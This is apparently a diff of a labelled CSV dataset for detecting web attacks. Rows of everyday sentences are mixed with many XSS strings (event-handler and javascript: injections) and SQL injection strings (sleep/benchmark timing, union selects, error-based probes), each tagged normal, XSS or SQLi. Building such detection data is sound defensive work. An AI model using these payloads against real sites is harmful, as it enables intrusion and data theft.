-"<tfoot draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6852 -"1"" ) as yggn where 1006 = 1006 procedure analyse (",2,SQLi,18232 -"1' ) and elt ( 7554 = 6257,6257 ) and ( 'bpzm' = '",2,SQLi,17719 -Where did you find that rare book?,0,normal,22955 -"Protune remains with some small tweaks New ""linear",0,normal,25760 -"<code draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,6998 -where,0,normal,26523 +"<summary onkeydown=""alert(1)"" contenteditable>test",1,XSS,4431 +"<shadow onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,3059 +"To change the format, go to your Memories, select ",0,normal,25280 +"<keygen draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,7063 +1 ) ) as rhwg where 8843 = 8843,2,SQLi,16551 +1' and ( select 2* ( if ( ( select * from ( select,2,SQLi,14866 +or pg_SLEEP(5),2,SQLi,10393 +;sleep(5)--,2,SQLi,11350 +"-7686%"" ) or 1 group by concat ( 0x7171706a71, ( s",2,SQLi,12215 +"<style>@keyframes x{}</style><button style=""animat",1,XSS,3320 +1 ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 wh,2,SQLi,12121 +<i onpointerdown=alert(1)>XSS</i>,1,XSS,7868 +1' ) as rbpx where 1264 = 1264,2,SQLi,12129 +"<menu draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,6854 +1 ) where 8338 = 8338 and 6055 = ctxsys.drithsx.sn,2,SQLi,18234 +"1"" where 7110 = 7110",2,SQLi,17721 +Select your favorite song to play.,0,normal,22952 +Read about how to select the correct 529 college s,0,normal,25757 +<form id=x tabindex=1 onfocus=alert(1)></form>,1,XSS,7000 +from,0,normal,26520 "<div style=""background:url(/f#&#127;oo/;color:red/",1,XSS,707 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3492 -1' in boolean mode ) or 8466 = benchmark ( 5000000,2,SQLi,15340 -<thead onpointerdown=alert(1)>XSS</thead>,1,XSS,4574 -1'|| ( select 'oxas' from dual where 8284 = 8284 o,2,SQLi,13248 -"-1337"" ) union all select 7508--",2,SQLi,15824 -Update your profile picture with the new one.,0,normal,22930 -<input4 onpointerup=alert(1)>XSS</input4>,1,XSS,7055 -"<map onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5581 -"<nobr onpaste=""alert(1)"" contenteditable>test</nob",1,XSS,3152 -"<picture onbeforepaste=""alert(1)"" contenteditable>",1,XSS,6618 -"select * from users where id = 1 or "";."" = 1 or 1 ",2,SQLi,11992 -"<main onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,4023 -1'|| ( select 'yrau' where 7860 = 7860 and 6414 = ,2,SQLi,21284 -"<keygen onkeypress=""alert(1)"" contenteditable>test",1,XSS,2608 -select * from users where id = 1 % ( @ ) or 1 = 1 ,2,SQLi,11631 -"<div id=""130""><math href=""javascript:alert(130)"">C",1,XSS,9119 -<html ontouchcancel=alert(1)>,1,XSS,9183 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2430 -"iif ( 7011 = 2522,1,1/0 )",2,SQLi,16631 -"<link draggable=""true"" ondrag=""alert(1)"">test</lin",1,XSS,3816 --9370' ) where 7070 = 7070 or make_set ( 9354 = 93,2,SQLi,20680 -Select alternate.,0,normal,24758 -1 ) ) as xbii where 2262 = 2262 or sleep ( 5 ) --,2,SQLi,18647 +"<samp onmouseup=""alert(1)"">test</samp>",1,XSS,3494 +1'|| ( select 'ytwz' from dual where 3025 = 3025 a,2,SQLi,15342 +<svg><template onload=alert(1)></template>,1,XSS,4576 +1 ) ) and ( select 9067 from ( select count ( * ) ,2,SQLi,13250 +"1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |",2,SQLi,15826 +Delete the old bookmarks from your browser.,0,normal,22927 +<acronym id=x tabindex=1 onactivate=alert(1)></acr,1,XSS,7057 +"<fieldset draggable=""true"" ondragend=""alert(1)"">te",1,XSS,5583 +"<ins onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3154 +"<meta onkeypress=""alert(1)"" contenteditable>test</",1,XSS,6620 +select * from users where id = 1 union select 1`\`,2,SQLi,11994 +"<isindex onbeforepaste=""alert(1)"" contenteditable>",1,XSS,4025 +"1%' ) ) ) procedure analyse ( extractvalue ( 5840,",2,SQLi,21282 +<select id=x tabindex=1 ondeactivate=alert(1)></se,1,XSS,2609 +declare @s varchar ( 22 ) select @s =,2,SQLi,11633 +"<div id=""132""><!doctype html>",1,XSS,9121 +<html ontouchmove=alert(1)>,1,XSS,9185 +<style>:target {color:red;}</style><ins id=x style,1,XSS,2431 +-3339' or 8571 = 8571--,2,SQLi,16633 +"<small draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,3818 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,20678 +Select transfer.,0,normal,24755 +1' ) or sleep ( 5 ) and ( 'fizk' = 'fizk,2,SQLi,18649 <img/src=`%00` onerror=this.onerror=confirm(1),1,XSS,836 -1' where 1623 = 1623,2,SQLi,13257 -Delete the old messages.,0,normal,22611 -<svg><param onload=alert(1)></param>,1,XSS,8625 -"<IMG SRC=x onbeforeunload=""alert(String.fromCharCo",1,XSS,1174 -Up to 45% off select Milwaukee Power Tools and Acc,0,normal,25205 -"<style>@keyframes x{}</style><aside style=""animati",1,XSS,8103 --1087 ) where 5787 = 5787 union all select 5787#,2,SQLi,16118 -"<tfoot onkeyup=""alert(1)"" contenteditable>test</tf",1,XSS,8099 -<style>:target {color:red;}</style><span id=x styl,1,XSS,4952 --5160' ) as kgjw where 9609 = 9609 union all selec,2,SQLi,15195 -"1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""hvic"" l",2,SQLi,16635 -1%' ) or 8421 = ( select count ( * ) from generate,2,SQLi,20112 -"{""id"":null,""name"":""sat knew""}",0,normal,27326 -1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,19178 -1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,20331 -<video onpointerup=alert(1)>XSS</video>,1,XSS,7796 -"Simply add the items you want, select the most app",0,normal,25550 -"<map onmousemove=""alert(1)"">test</map>",1,XSS,3408 -"-7323%"" or 4144 = ( select upper ( xmltype ( chr (",2,SQLi,21194 --7770' where 6503 = 6503 or 2724 in ( ( char ( 113,2,SQLi,15785 -`'><script>-javascript:alert(518)</script>,1,XSS,8964 -"<ins onkeyup=""alert(1)"" contenteditable>test</ins>",1,XSS,1998 -She'll join the meeting.,0,normal,22564 -like,0,normal,23134 -<bdi onblur=alert(1) tabindex=1 id=x></bdi><input ,1,XSS,5630 -"<style>@keyframes x{}</style><br style=""animation-",1,XSS,4003 -"-4954%"" ) or 5244 = 4832",2,SQLi,22447 -<track onpointerleave=alert(1)>XSS</track>,1,XSS,4754 -Crate & Barrel: 15% off select full-priced items u,0,normal,26263 -"1 where 6412 = 6412 union all select null,null,nul",2,SQLi,16957 -"<shadow onmouseup=""alert(1)"">test</shadow>",1,XSS,3682 -"1%' ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x",2,SQLi,19404 -url(javascript:alert(''),1,XSS,7449 -select pg_sleep ( 5 ),2,SQLi,20340 -"-4145%"" ) ) union all select 9404,9404,9404,9404,9",2,SQLi,13136 -"<cite onmouseover=""alert(1)"">test</cite>",1,XSS,3986 -1' ) where 6440 = 6440 or ( select * from ( select,2,SQLi,22093 -"<image style='filter:url(""data:image/svg+xml,<svg ",1,XSS,9206 -Select the right playlist for the moment.,0,normal,24139 -"1"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) )",2,SQLi,18954 -"<svg onkeypress=""alert(1)"" contenteditable>test</s",1,XSS,4278 -"<rtc onmousedown=""alert(1)"">test</rtc>",1,XSS,3667 -"<figure draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,8413 -"1"" ) where 7471 = 7471 or char ( 75 ) ||char ( 70 ",2,SQLi,18831 -"1 ) ) or ( select 9173 from ( select count ( * ) ,",2,SQLi,20150 -"<var oncut=""alert(1)"" contenteditable>test</var>",1,XSS,6521 -The struggle was thus renewed on the old ground of,0,normal,25368 -1' ) ) and 9660 = ( select count ( * ) from all_us,2,SQLi,19557 -1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,17608 -1 ) ( select ( case when ( 5451 = 5451 ) then rege,2,SQLi,15465 -union ( select @@version ) --,2,SQLi,11832 -1' where 5230 = 5230,2,SQLi,16929 -"<IMG SRC=x onmousewheel=""alert(String.fromCharCode",1,XSS,1205 -"<style>@keyframes x{}</style><nobr style=""animatio",1,XSS,2884 -<legend onpointerenter=alert(1)>XSS</legend>,1,XSS,8614 -<script src=//3334957647/1>,1,XSS,9258 -"<style>@keyframes x{}</style><dt style=""animation-",1,XSS,7243 -"<style>@keyframes slidein {}</style><rt style=""ani",1,XSS,2638 -database,0,normal,23153 -To select your chosen venue from this shortlist si,0,normal,25242 -"1"" ) where 6964 = 6964",2,SQLi,19050 -"1' where 8083 = 8083 and updatexml ( 3393,concat (",2,SQLi,18253 -"Pickup options: During checkout, choose Store Pick",0,normal,25778 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13259 +Update the calendar events.,0,normal,22608 +"<track oncopy=""alert(1)"" contenteditable>test</tra",1,XSS,8627 +"<IMG SRC=x onerror=""alert(String.fromCharCode(88,8",1,XSS,1175 +"-8143 union all select 4492,4492,4492,4492,4492,44",2,SQLi,20782 +"<hr draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,8105 +1 where 8390 = 8390 and 3824 = benchmark ( 5000000,2,SQLi,16120 +<style>@keyframes slidein {}</style><picture style,1,XSS,8101 +<col id=x tabindex=1 onfocus=alert(1)></col>,1,XSS,4954 +"-5187"" ) union all select 3373,3373#",2,SQLi,15197 +1' where 3125 = 3125 ( select ( case when ( 5451 =,2,SQLi,16637 +"-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( ",2,SQLi,20308 +"{""id"":null,""firstName"":""Anna"",""lastName"":""Tan"",""ad",0,normal,27325 +"-3393"" ) ) union all select 5954,5954,5954,5954,59",2,SQLi,19180 +1' or 8315 = ( select count ( * ) from sysibm.syst,2,SQLi,20329 +<samp id=x tabindex=1 onfocusin=alert(1)></samp>,1,XSS,7798 +Simply select modules from the library and connect,0,normal,25547 +"<param onmouseup=""alert(1)"">test</param>",1,XSS,3410 +-3677' ) ) or 1939 = 4484,2,SQLi,21192 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,15787 +`'><script>\x09javascript:alert(507)</script>,1,XSS,8966 +"<style>@keyframes x{}</style><ins style=""animation",1,XSS,1999 +1 or 7427 = dbms_pipe.receive_message ( chr ( 116 ,2,SQLi,22259 +Select the perfect proposal spot.,0,normal,24365 +<bdi onpointerup=alert(1)>XSS</bdi>,1,XSS,5632 +<tr onfocusout=alert(1) tabindex=1 id=x></tr><inpu,1,XSS,4005 +"1', ( case when 2872 = 2872 then 1 else null end )",2,SQLi,22429 +"<u onmousemove=""alert(1)"">test</u>",1,XSS,4756 +"Crew: 30% off select full-price styles, and an ext",0,normal,26260 +1' ) ) as bewk where 3672 = 3672 or sleep ( 5 ) --,2,SQLi,16959 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3684 +1' and 7533 = 7533,2,SQLi,19406 +"<blink onmouseenter=""alert(1)"">test</blink>",1,XSS,7451 +He'll modify the recipe.,0,normal,22997 +1'|| ( select 'mdqc' where 4533 = 4533 and 8189 = ,2,SQLi,13138 +"<embed oncut=""alert(1)"" contenteditable>test</embe",1,XSS,3988 +-2039' ) or 2724 in ( ( char ( 113 ) +char ( 113 ),2,SQLi,22091 +"<image xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,9208 +1%' ) and 3580 = ( select count ( * ) from domain.,2,SQLi,21173 +1%' ) ) and 9660 = ( select count ( * ) from all_u,2,SQLi,18956 +"<span oncopy=""alert(1)"" contenteditable>test</span",1,XSS,4280 +"<select onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,3669 +<svg onpointerup=alert(1)>XSS</svg>,1,XSS,8415 +1'|| ( select 'jrbp' from dual where 4129 = 4129 o,2,SQLi,18833 +1' ) where 2840 = 2840,2,SQLi,20148 +<ul id=x tabindex=1 ondeactivate=alert(1)></ul><in,1,XSS,6523 +The Technology Select Sector SPDR ETF (XLK) closed,0,normal,25365 +1 ) and ( select 2* ( if ( ( select * from ( selec,2,SQLi,19559 +1' and 8407 = ( select count ( * ) from generate_s,2,SQLi,17610 +select case when 8867 = 7630 then 1 else null end-,2,SQLi,15467 +"union ( select NULL, NULL, NULL, NULL, NULL, ( sel",2,SQLi,11834 +1' ) as bzem where 4240 = 4240,2,SQLi,16931 +"<IMG SRC=x onwheel=""alert(String.fromCharCode(88,8",1,XSS,1206 +<tfoot onpointermove=alert(1)>XSS</tfoot>,1,XSS,2885 +<tbody id=x tabindex=1 onactivate=alert(1)></tbody,1,XSS,8616 +<script src=javascript:alert(1)>,1,XSS,9260 +"<style>@keyframes slidein {}</style><thead style=""",1,XSS,7245 +"<area oncontextmenu=""alert(1)"">test</area>",1,XSS,2639 +"1%"" and elt ( 5345 = 8751,8751 ) and ""%"" = """,2,SQLi,20508 +Toggle the active button to select which of the la,0,normal,25239 +"1"" ) ) and 8407 = ( select count ( * ) from genera",2,SQLi,19052 +1' rlike ( select ( case when ( 7689 = 7689 ) then,2,SQLi,18255 +Please select a thumbnail to get a larger image.,0,normal,25775 "<a href=""javascript&colon;\u0061&#x6C;&#101%72t&lp",1,XSS,878 -"{""id"":null,""name"":""cover drive""}",0,normal,27272 -"<style>@keyframes x{}</style><audio style=""animati",1,XSS,4380 -23 OR 1 = 1,2,SQLi,11958 -Where's your SQL objective?,0,normal,23434 -"<h1 onmouseover=""alert(1)"">test</h1>",1,XSS,3909 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10764 -"<pre ondblclick=""alert(1)"">test</pre>",1,XSS,7689 -Save up to 80% off select Best Selling Kindle eBoo,0,normal,25705 -"<dt onpaste=""alert(1)"" contenteditable>test</dt>",1,XSS,8076 -"1' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153",2,SQLi,14636 -"1"" where 9230 = 9230",2,SQLi,13162 -<canvas id=x tabindex=1 onfocusin=alert(1)></canva,1,XSS,6480 -"""><img src=""x:x"" onerror=""alert()"">",1,XSS,4712 -"No bishop or archdeacon "" shall any longer hold pl",0,normal,25867 -select case when 6420 = 7941 then 1 else null end-,2,SQLi,12477 +"{""id"":null,""name"":""correctly""}",0,normal,27466 +"<hr onmouseout=""alert(1)"">test</hr>",1,XSS,4382 +select * from users where id = '1' or @ ( 1 ) = 1 ,2,SQLi,11960 +Where's your SQL function?,0,normal,23431 +"<wbr onkeyup=""alert(1)"" contenteditable>test</wbr>",1,XSS,3911 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10766 +"<cite onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,7691 +"Scroll down a bit until you see ""FaceTime"" and sel",0,normal,25702 +<br onpointermove=alert(1)>XSS</br>,1,XSS,8078 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14638 +1' ) ) as plgq where 1121 = 1121,2,SQLi,13164 +<object onfocusout=alert(1) tabindex=1 id=x></obje,1,XSS,6482 +"<shadow draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,4714 +1 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||cha,2,SQLi,20143 +1' ) and 4595 = 4595#,2,SQLi,12479 "&lt;IMG SRC='vbscript&#058;msgbox(\""XSS\"")'&gt;",1,XSS,990 -<style>:target {color: red;}</style><dt id=x style,1,XSS,2683 -1'+ ( select 'qmtx' where 6992 = 6992 and 8148 = l,2,SQLi,18893 -"<video src=_ onloadstart=""alert(1)"">",1,XSS,9703 -"-3349' or elt ( 6610 = 4379,4379 ) and 'poqm' like",2,SQLi,17393 -Determine values where necessary.,0,normal,23260 -1'|| ( select 'gtri' from dual where 7097 = 7097 a,2,SQLi,20119 -))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) ,2,SQLi,11197 -"<datalist onkeyup=""alert(1)"" contenteditable>test<",1,XSS,7788 -1' or sleep ( 5 ),2,SQLi,18261 -1' ) where 4297 = 4297 or 2367 = ( select count ( ,2,SQLi,16100 -<a onpointerup=alert(1)>XSS</a>,1,XSS,3824 -"<br onbeforecut=""alert(1)"" contenteditable>test</b",1,XSS,8447 -1' where 2958 = 2958,2,SQLi,21279 -"<ins onkeydown=""alert(1)"" contenteditable>test</in",1,XSS,5160 -"When you select print, the default printer is set ",0,normal,25143 -"1"" and 6414 = ( select count ( * ) from rdb$fields",2,SQLi,17144 +"<data onmouseover=""alert(1)"">test</data>",1,XSS,2684 +"-1763%"" or ( 8459 = 8459 ) *4906 and ""%"" = """,2,SQLi,18895 +"<meta/content=""0;url=data:text/html;base64,PHNjcml",1,XSS,9705 +"1 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ",2,SQLi,17395 +"1', ( case when 3598 = 2118 then 1 else null end )",2,SQLi,20805 +1 ) where 4992 = 4992,2,SQLi,20121 +AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ,2,SQLi,11199 +"<script oncontextmenu=""alert(1)"">test</script>",1,XSS,7790 +1%' ) ) and 3754 = ( select upper ( xmltype ( chr ,2,SQLi,18263 +"iif ( 2084 = 5671,1,1/0 )",2,SQLi,16102 +"<label onmousemove=""alert(1)"">test</label>",1,XSS,3826 +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><in,1,XSS,8449 +"-7796' ) union all select 4960,4960,4960,4960,4960",2,SQLi,21277 +"<dir draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5162 +"When you select the eraser, the options bar at the",0,normal,25140 +-2254' ) as dyrv where 9079 = 9079 union all selec,2,SQLi,17146 "<img \x12src=x onerror=""javascript:alert(1)"">",1,XSS,655 -"<dt onclick=""alert(1)"">test</dt>",1,XSS,5813 -"<ruby onkeyup=""alert(1)"" contenteditable>test</rub",1,XSS,2893 -"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,16180 -One remedy is to select who can and can't message ,0,normal,25824 -<fieldset id=x tabindex=1 onfocusin=alert(1)></fie,1,XSS,5637 -<button onErrorUpdate=javascript:alert(1)>,1,XSS,9613 -"<slot onclick=""alert(1)"">test</slot>",1,XSS,3045 -Up to extra $50 off select HP Products with Doorbu,0,normal,25201 -<colgroup id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,8446 -1' ) as kqbh where 6138 = 6138,2,SQLi,22255 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6160 -1 ) as kaew where 2658 = 2658,2,SQLi,13516 -"1"" where 1765 = 1765 union all select null,null,nu",2,SQLi,19544 -"-1891' in boolean mode ) union all select 6680,668",2,SQLi,12570 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6023 -"<p oncopy=""alert(1)"" contenteditable>test</p>",1,XSS,5093 -1 ) ) as gygm where 4024 = 4024,2,SQLi,13570 -) RLIKE SLEEP(5) AND ('1337'='1337,2,SQLi,11212 -1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11222 -1' ) ) ) and 6414 = ( select count ( * ) from rdb$,2,SQLi,20573 -Save up to 35% off select McCafe K-Cups and Coffee,0,normal,25715 -1'+ ( select 'qxmo' where 9511 = 9511 rlike ( sele,2,SQLi,22073 -"-2982' or 1570 = convert ( int, ( select char ( 11",2,SQLi,17516 -"<title onmouseleave=""alert(1)"">test</title>",1,XSS,3660 -<dfn id=x tabindex=1 onactivate=alert(1)></dfn>,1,XSS,3327 -<img src=x:prompt(eval(alt)) onerror=eval(src) alt,1,XSS,9466 -"1"" ) ) and 8635 = ( select count ( * ) from genera",2,SQLi,15034 -<colgroup onpointerleave=alert(1)>XSS</colgroup>,1,XSS,2664 -Where's the pub?,0,normal,23544 -union select * from users where login = char ( 114,2,SQLi,11674 -"{""id"":null,""firstName"":""Rahiman"",""lastName"":""Ibrah",0,normal,27117 -"<strike onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,1928 -"1%' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ",2,SQLi,22100 -"1%"" ) ) and 6414 = ( select count ( * ) from rdb$f",2,SQLi,14133 -Mark & Graham: Up to 503% off select home and outd,0,normal,25893 -<style onpointerover=alert(1)>XSS</style>,1,XSS,2881 -"-8013%"" or 1570 = convert ( int, ( select char ( 1",2,SQLi,19766 -1%' ) ) ) and 4386 = utl_inaddr.get_host_address (,2,SQLi,13563 -"javascript:`//""//\""//</title></textarea></style></",1,XSS,9495 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,21195 -Find data where required.,0,normal,23346 -Select pause.,0,normal,24588 -"-3963"" or 1224 = 5119",2,SQLi,16196 -"<base draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4621 +"<audio onmouseenter=""alert(1)"">test</audio>",1,XSS,5815 +<summary onpointerenter=alert(1)>XSS</summary>,1,XSS,2894 +1'|| ( select 'awic' where 5227 = 5227,2,SQLi,16182 +Only a select few will have to work past 70.,0,normal,25821 +<basefont onpointerout=alert(1)>XSS</basefont>,1,XSS,5639 +<button onFinish=javascript:alert(1)>,1,XSS,9615 +<style>:target {color:red;}</style><tfoot id=x sty,1,XSS,3046 +Urban Outfitters: 25 percent off select items; thr,0,normal,25198 +"<marquee onmouseover=""alert(1)"">test</marquee>",1,XSS,8448 +"-7433"" ) ) as zsnt where 2513 = 2513 or 4493 = utl",2,SQLi,22350 +<address id=x tabindex=1 ondeactivate=alert(1)></a,1,XSS,6162 +"1' in boolean mode ) or row ( 1045,7562 ) > ( sele",2,SQLi,13518 +"1' and 4241 = convert ( int, ( select char ( 113 )",2,SQLi,19546 +"1"" ) ) as frsd where 6475 = 6475 union all select ",2,SQLi,12572 +"<fieldset onpaste=""alert(1)"" contenteditable>test<",1,XSS,6025 +<noembed onpointerup=alert(1)>XSS</noembed>,1,XSS,5095 +1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 1,2,SQLi,13572 +))) RLIKE SLEEP(5) AND ((('1337'='1337,2,SQLi,11214 +)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11224 +1 ) as nioj where 9703 = 9703,2,SQLi,20571 +What I am proposing is that the select minority of,0,normal,25162 +"1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""dhss",2,SQLi,22071 +select ( case when ( 8642 = 6049 ) then 1 else 864,2,SQLi,17518 +<style>:target {color: red;}</style><dfn id=x styl,1,XSS,3662 +<thead id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,3329 +"<iframe src=""""/srcdoc='<svg onload=alert(1)>'>",1,XSS,9468 +select sleep ( 5 ),2,SQLi,15036 +<small id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,2665 +Where's the cinema?,0,normal,23541 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11676 +"{""id"":null,""firstName"":""Qin"",""lastName"":""Bo"",""addr",0,normal,27115 +<style>:target {transform: rotate(180deg);}</style,1,XSS,1929 +1' or 9643 = ( select count ( * ) from domain.doma,2,SQLi,22098 +"-6599%"" ) ) or make_set ( 9354 = 9354,7185 ) and (",2,SQLi,14135 +"Marsden, Select Pleas in the Court of Admiralty, p",0,normal,25890 +"<form onmouseenter=""alert(1)"">test</form>",1,XSS,2882 +"1 ) where 8691 = 8691 or 8384 = like ( 'abcdefg',u",2,SQLi,19768 +1 ) where 2734 = 2734 waitfor delay '0:0:5'--,2,SQLi,13565 +"javascript:""/*'//`//\""//</template/</title/</texta",1,XSS,9497 +"1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,21193 +Specify filters where necessary.,0,normal,23343 +Select begin.,0,normal,24585 +1'+ ( select ukwc where 3008 = 3008 or ( select * ,2,SQLi,16198 +"<colgroup onkeydown=""alert(1)"" contenteditable>tes",1,XSS,4623 <BODY ONLOAD=alert(‘XSS’)>,1,XSS,943 -Doorbusters include 40% off select women's shoes a,0,normal,26232 -1' ) ) ) or 8156 = ( select count ( * ) from gener,2,SQLi,19620 -It is merely necessary to select some larger or sm,0,normal,25963 --7951' ) ) ) or 2724 in ( ( char ( 113 ) +char ( 1,2,SQLi,19642 --6757' ) ) ) or 4524 = 3696,2,SQLi,16578 -"-6357"" ) order by 1--",2,SQLi,16523 -"<rt draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,8369 -<html id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,8628 -1' ( select ( case when ( 4587 = 4587 ) then regex,2,SQLi,16693 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,17950 --7319 or 4493 = utl_inaddr.get_host_address ( chr ,2,SQLi,12157 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6728 -"1"" ) where 8462 = 8462 and updatexml ( 3393,concat",2,SQLi,18520 -"-4669' union all select 9387,9387,9387,9387,9387,9",2,SQLi,21241 -Just select the books category with the drop-down ,0,normal,25927 -1' ) ) as cmll where 7948 = 7948 and 4386 = utl_in,2,SQLi,18661 -( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ),2,SQLi,12818 -1' ) ) or exp ( ~ ( select * from ( select concat ,2,SQLi,21372 -"If large images still look jagged, click Tools wit",0,normal,26057 -<style>:target {color: red;}</style><span id=x sty,1,XSS,2624 -<style>@keyframes slidein {}</style><isindex style,1,XSS,8535 -1 ) as ywrn where 1893 = 1893,2,SQLi,18302 -1 ) where 1203 = 1203 rlike ( select * from ( sele,2,SQLi,16616 -<object id=x tabindex=1 onactivate=alert(1)></obje,1,XSS,8372 -"1 ) union all select null,null,null,null,null,null",2,SQLi,20240 +Draper James: 50 percent off select styles; throug,0,normal,26229 +1' ) ) and sleep ( 5 ) #,2,SQLi,19622 +"Olsson will work with select ""tribe leaders"" to cr",0,normal,25852 +"-4736' ) ) or elt ( 5835 = 5509,5509 ) and ( ( 'ia",2,SQLi,19644 +-6586' ) ) or 2021 = 2996,2,SQLi,16580 +"1 and make_set ( 9681 = 4703,4703 ) # zbrf",2,SQLi,16525 +<style>:target {color:red;}</style><img id=x style,1,XSS,8371 +"<multicol ondblclick=""alert(1)"">test</multicol>",1,XSS,8630 +select case when 2948 = 7279 then 1 else null end-,2,SQLi,16695 +"1%"" ) ) ) and sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,17952 +"1%"" ) and 2006 = 2006",2,SQLi,12159 +"<col draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,6730 +-2630' ) ) as xavw where 6291 = 6291 union all sel,2,SQLi,18522 +"iif ( 9875 = 8961,1,1/0 )",2,SQLi,21239 +Katie had been helping her select clothing and she,0,normal,25924 +1' ) ) as xrre where 1172 = 1172 and updatexml ( 3,2,SQLi,18663 +"1"" ) ) as ljhz where 2416 = 2416",2,SQLi,12820 +"1' ) ) ) and 4241 = convert ( int, ( select char (",2,SQLi,21370 +If these insects select only full grown caterpilla,0,normal,26054 +"<p onmousedown=""alert(1)"">test</p>",1,XSS,2625 +"<STYLE TYPE=""text/javascript"">alert('');</STYLE>",1,XSS,8537 +"1"" ( select ( case when ( 5451 = 5451 ) then regex",2,SQLi,18304 +1 where 3357 = 3357 and ( 9492 = 4334 ) *4334--,2,SQLi,16618 +<video autoplay controls onwaiting=alert(1)><sourc,1,XSS,8374 +-6036 ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr (,2,SQLi,20238 <BODY ONLOAD=javascript:alert(1)>,1,XSS,738 -"{""id"":null,""firstName"":""Adsee"",""lastName"":""Wei"",""a",0,normal,27089 -1' ) ) ) rlike ( select * from ( select ( sleep ( ,2,SQLi,20797 -1 ( select ( case when ( 4587 = 4587 ) then regexp,2,SQLi,22295 -"1"" ) or ( select 2* ( if ( ( select * from ( selec",2,SQLi,14058 -"1"" ) or 9643 = ( select count ( * ) from domain.do",2,SQLi,14880 -1' ) ) and 8514 = ( select count ( * ) from domain,2,SQLi,14250 -"-4869%' union all select 5729,5729,5729--",2,SQLi,21967 -"-4340 ) ) or make_set ( 9354 = 9354,7185 ) and ( (",2,SQLi,21157 -"1', ( case when 3598 = 2118 then 1 else null end )",2,SQLi,20805 -"javascript:""/*'/*\""/*` /**/alert()//--></title></t",1,XSS,9514 -%2A%7C,2,SQLi,10188 -"<th onpaste=""alert(1)"" contenteditable>test</th>",1,XSS,6496 +"{""id"":null,""name"":""dried""}",0,normal,27087 +Create sculpture.,0,normal,23028 +1' and ( 3020 = 3020 ) *6703 and 'qsrz' = 'qsrz,2,SQLi,22293 +"1"" where 1234 = 1234",2,SQLi,14060 +"1"" ) ) as dksq where 7161 = 7161",2,SQLi,14882 +"-7945%' ) ) ) union all select 4286,4286,4286,4286",2,SQLi,14252 +"{""id"":null,""firstName"":""Goh"",""lastName"":""Katherine",0,normal,27608 +"1%"" ) and sleep ( 5 ) #",2,SQLi,21155 +"1%"" ) ) ) and 1594 = 8757",2,SQLi,20803 +javascript:`/*</title></style></textarea></noscrip,1,XSS,9516 +declare @s varchar(200) select @s = 0x77616974666F,2,SQLi,10190 +"<style>@keyframes x{}</style><embed style=""animati",1,XSS,6498 "<STYLE>li {list-style-image: url(""javascript:javas",1,XSS,756 -"{""id"":null,""firstName"":""Quan"",""lastName"":""Yuan"",""a",0,normal,26776 -1'+ ( select lptb where 3861 = 3861 or sleep ( 5 ),2,SQLi,20676 -"1"" ) and 2716 = ( select count ( * ) from sysusers",2,SQLi,15803 -Select the appropriate size for the shoes.,0,normal,24087 -Select the item.,0,normal,22879 -<samp 